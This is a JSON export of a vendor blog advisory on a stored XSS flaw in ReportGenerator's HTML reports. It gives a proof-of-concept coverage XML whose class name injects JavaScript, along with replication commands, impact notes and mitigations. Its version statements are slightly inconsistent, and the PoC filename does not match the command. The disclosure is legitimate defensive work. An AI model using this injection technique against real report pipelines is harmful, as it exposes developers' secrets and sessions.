{"id":47071,"date":"2026-05-25T10:43:05","date_gmt":"2026-05-25T05:13:05","guid":{"rendered":"https:\/\/www.getastra.com\/blog\/?p=47071"},"modified":"2026-05-25T10:43:07","modified_gmt":"2026-05-25T05:13:07","slug":"stored-xss-in-html-report-generator","status":"publish","type":"post","link":"https:\/\/www.getastra.com\/blog\/vulnerability\/stored-xss-in-html-report-generator\/","title":{"rendered":"Stored XSS in HTML Report Generator"},"content":{"rendered":"<div class=\"gb-container gb-container-83f53fef\">\n\n<p class=\"wp-block-paragraph\"><strong>Product Name:<\/strong> HTML  Report Generator<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>Vulnerability:<\/strong> Stored Cross-Site Scripting(XSS)<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>Vulnerable Version:<\/strong> &lt; 5.5.8<\/p>\n\n<\/div>\n\n\n<p class=\"wp-block-paragraph\">In May 2026, security researchers at Astra identified a stored Cross-Site Scripting (XSS) Vulnerability in HTML ReportGenerator, affecting versions up to 5.5.8.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Cross-Site Scripting(XSS) is a general web security vulnerability that allows threat actors to inject malicious scripts into a web application. This type of vulnerability is mostly exploited to perform actions on behalf of the victim or to mine cryptocurrency.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"Technical_Breakdown\"><\/span>Technical Breakdown <span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">The stored XSS vulnerability was discovered during a manual security review of the HTML report-generation functionality. This flaw is very dangerous in a development environment where HTML reports are frequently generated and opened by devs from CI\/CD pipelines, shared folders, or local machines<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">How was it discovered?<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">Our researcher discovered this vulnerability while examining how user-controlled coverage metadata is processed and embedded into the reports. It was observed that values like class names and assembly names from XML inputs were directly inserted into JavaScript object literals inside the generated main.js file without proper JavaScript\/JSON escaping.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Only backslashes were allowed to escape, while quotation marks and other JavaScript metacharacters remained unsanitized. By crafting a malicious coverage XML file with a specially formatted class name, it is possible to inject arbitrary JavaScript into the generated report.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">How to replicate the vulnerability<\/h3>\n\n\n\n<ol class=\"wp-block-list\">\n<li>Install a vulnerable version before<strong> 5.5.9<\/strong>(e.g., 5.5.8)<\/li>\n\n\n\n<li>Create an <strong>XML file <\/strong>with the code below and name it malicious-coverage.xml<\/li>\n<\/ol>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?xml version=\"1.0\" encoding=\"UTF-8\"?>\n&lt;coverage line-rate=\"0\" branch-rate=\"0\" version=\"1.0\">\n  &lt;packages>\n    &lt;package name=\"demo\">\n      &lt;classes>\n        &lt;class\n          name=\"\\&amp;quot;, &amp;quot;x&amp;quot;:(alert('XSS'),true), &amp;quot;z&amp;quot;: &amp;quot;\"\n          filename=\"test.cs\"\n          line-rate=\"0\"\n          branch-rate=\"0\">\n          &lt;methods\/>\n          &lt;lines\/>\n        &lt;\/class>\n      &lt;\/classes>\n    &lt;\/package>\n  &lt;\/packages>\n&lt;\/coverage>\n<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">3.\u00a0Generate the report using this command. <\/p>\n\n\n\n<ol start=\"4\" class=\"wp-block-list\"><\/ol>\n\n\n\n<pre class=\"wp-block-code\"><code>dotnet ReportGenerator.dll \\\n-reports:poc.xml \\\n-targetdir:report \\\n-reporttypes:Html<\/code><\/pre>\n\n\n<div class=\"gb-container gb-container-35f61913\">\n\n<p class=\"wp-block-paragraph\">4. \u00a0Trigger the XSS by opening the report.<\/p>\n\n\n\n<style>\n.ctaSaasCheckWrap{\n  padding:35px;\n  border: 6px;\n  background-image: url('https:\/\/cdn-blog.getastra.com\/2025\/08\/0737b9ac-deepblue-bg.png');\n  background-size: cover;\n  background-repeat: no-repeat;\n  position: relative;\n  background-position: right;\n  height: 275px;\n  border-radius: 10px;\n  margin: 20px 0px;\n}\n.pentestHeadingDB{\n  color: #fff;\n  font-size: 24px;\n  font-weight: 600;\n  max-width: 450px;\n}\n.ctaSaasCheckWrapHead {\n    display: flex;\n    align-items: center;\n    grid-gap: 1rem;\n}\n.ctaOneDB {\n    display: flex;\n  align-items: center;\n  padding: 1rem 1.5rem;\n  border-radius: 12px;\n  background-color: #FCBB2F;\n  text-decoration: none;\n  grid-gap: .5rem;\n  color: #000!important;\n  font-size: 18px;\n  font-weight: 500;\n  min-height: 3.75rem;\n  max-height: 3.75rem;\n  box-shadow: 0 4px 4px #00000014, 0 0 0 1px #c08e24, inset 0 -4px #0000003d;\n}\n.ctaTwo {\n    text-decoration: none;\n    background-color: #24BC94;\n    color: #ffffff !important;\n    padding: 10px 25px;\n    border-radius: 6px;\n    font-weight: 600;\n}\n.spanBoldBlue {\n    color: #3078FE;\n    font-weight: 700;\n}\n.ctaSaasCheckWrapImg{\n  position: absolute;\n  bottom: 0px;\n  right: 10px;\n  height: 250px;\n  width: 240px;\n}\n@media(max-width: 768px){\n}\n@media(max-width: 576px){\n   .pentestHeading{\n      font-size: 28px;\n    }\n   .ctaSaasCheckWrapImg{\n     display: none;\n   }\n}\n<\/style>\n\n<div class=\"ctaSaasCheckWrap\">\n<p class=\"pentestHeadingDB\">Every fortnight our security engineers update DAST vulnerability scanner&#8217;s test cases. So we&#8217;re always one step ahead.<\/p>\n<div class=\"ctaSaasCheckWrapHead\">\n  <a class=\"ctaOneDB\" href=\"\/contact-us\">Get started at $7!<\/a>\n<\/div>\n<img decoding=\"async\" class=\"ctaSaasCheckWrapImg\" src=\"\/cdn-cgi\/image\/quality=80,format=auto,onerror=redirect,metadata=none\/https:\/\/cdn-blog.getastra.com\/2024\/08\/96ad3cf0-girlcta.png\" alt=\"character\" \/>\n\n<\/div>\n\n\n\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"Impact_of_Stored_XSS\"><\/span>Impact of Stored XSS<span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">The Stored XSS vulnerability in ReportGenerator <strong>(versions &lt; 5.5.9<\/strong>) is quite severe because the payload is embedded directly into the generated HTML report. Once the report is generated, anyone who opens it in a browser becomes a victim. This can impact developers, CI\/CD environments, shared coverage dashboards, and internally hosted reports.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>Defacement<\/strong>: Modify the appearance and content of the page to show fake messages and offensive content.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>Data Theft:<\/strong> Attackers can exfiltrate any data visible to the victim. It can be API keys, passwords, personal info, etc.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>Account Hijacking:<\/strong> Threat actors can steal session cookies and hijack the victim\u2019s account, allowing them to impersonate the victim to perform further malicious actions.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>Privilege escalation:<\/strong> If an admin views the page, the attacker can gain administrative access to move laterally.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>Phishing: <\/strong>Attackers can inject fake login forms or malicious links that look legitimate.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>Malware: <\/strong>Once the stored XSS is triggered, threat actors can exploit the browser context to download and run malware (e.g., keyloggers, ransomware).<\/p>\n\n<\/div>\n\n\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"Current_Status\"><\/span>Current Status <span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">The vulnerability in HTML render has been addressed in version<strong> 5.5.9<\/strong>, where proper sanitization and escaping measures have been implemented. The issue can be tracked under GitHub Advisory <strong>GHSA-mhh3-wmq6-w25q<\/strong>.<\/p>\n\n\n<div class=\"gb-container gb-container-2aa807b7\">\n<div class=\"gb-container gb-container-80479d65\">\n\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"What_Can_You_Do\"><\/span>What Can You Do?<span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Users are strongly advised to update ReportGenerator to version 5.5.9 to mitigate this vulnerability. If it\u2019s not possible due to compatibility issues, implement the following workarounds:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Sanitize the coverage XML before processing with a custom script that removes malicious or unsafe characters.<\/li>\n\n\n\n<li>Open reports in a sandboxed browser or with a strict content security policy.<\/li>\n\n\n\n<li>Disable JavaScript when viewing reports.<\/li>\n\n\n\n<li>Run ReportGenerator inside a container without network access.<\/li>\n\n\n\n<li>Block or validate coverage files from untrusted sources(pull requests).<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">Moreover, Astra Security can help you test for this vulnerability during <a href=\"https:\/\/www.getastra.com\/pentesting\/web-app\" target=\"_blank\" data-type=\"link\" data-id=\"https:\/\/www.getastra.com\/pentesting\/web-app\" rel=\"noreferrer noopener\">manual pentesting.<\/a><\/p>\n\n<\/div>\n<\/div>","protected":false},"excerpt":{"rendered":"<p>Product Name: HTML Report Generator Vulnerability: Stored Cross-Site Scripting(XSS) Vulnerable Version: &lt; 5.5.8 In May 2026, security researchers at Astra identified a stored Cross-Site Scripting (XSS) Vulnerability in HTML ReportGenerator, affecting versions up to 5.5.8. Cross-Site Scripting(XSS) is a general web security vulnerability that allows threat actors to inject malicious scripts into a web application. &#8230; <a title=\"Stored XSS in HTML Report Generator\" class=\"read-more\" href=\"https:\/\/www.getastra.com\/blog\/vulnerability\/stored-xss-in-html-report-generator\/\" aria-label=\"Read more about Stored XSS in HTML Report Generator\">Read more<\/a><\/p>\n","protected":false},"author":138,"featured_media":47077,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[723],"tags":[],"class_list":["post-47071","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/www.getastra.com\/blog\/wp-json\/wp\/v2\/posts\/47071","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.getastra.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.getastra.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.getastra.com\/blog\/wp-json\/wp\/v2\/users\/138"}],"replies":[{"embeddable":true,"href":"https:\/\/www.getastra.com\/blog\/wp-json\/wp\/v2\/comments?post=47071"}],"version-history":[{"count":1,"href":"https:\/\/www.getastra.com\/blog\/wp-json\/wp\/v2\/posts\/47071\/revisions"}],"predecessor-version":[{"id":47078,"href":"https:\/\/www.getastra.com\/blog\/wp-json\/wp\/v2\/posts\/47071\/revisions\/47078"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.getastra.com\/blog\/wp-json\/wp\/v2\/media\/47077"}],"wp:attachment":[{"href":"https:\/\/www.getastra.com\/blog\/wp-json\/wp\/v2\/media?parent=47071"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.getastra.com\/blog\/wp-json\/wp\/v2\/categories?post=47071"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.getastra.com\/blog\/wp-json\/wp\/v2\/tags?post=47071"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}